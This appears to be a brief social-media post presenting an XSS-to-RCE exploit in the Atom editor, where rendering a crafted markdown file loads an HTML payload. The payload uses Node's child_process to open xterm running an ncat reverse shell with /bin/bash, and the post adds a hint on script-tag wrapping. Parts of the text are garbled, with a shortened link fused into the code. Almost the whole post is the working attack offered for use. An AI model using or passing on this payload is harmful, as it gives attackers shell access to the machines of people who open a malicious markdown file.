XSS to RCE
🔥XSS -> RCE in Atom,
get a shell when rendering the markdown 😀
demo.md:
//iframe src="https://www.google.com/demo.htm"/>
demo.html:
https://t.co/UHPuX9MZXG.require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']);
Use script type in this payload eg.<--script>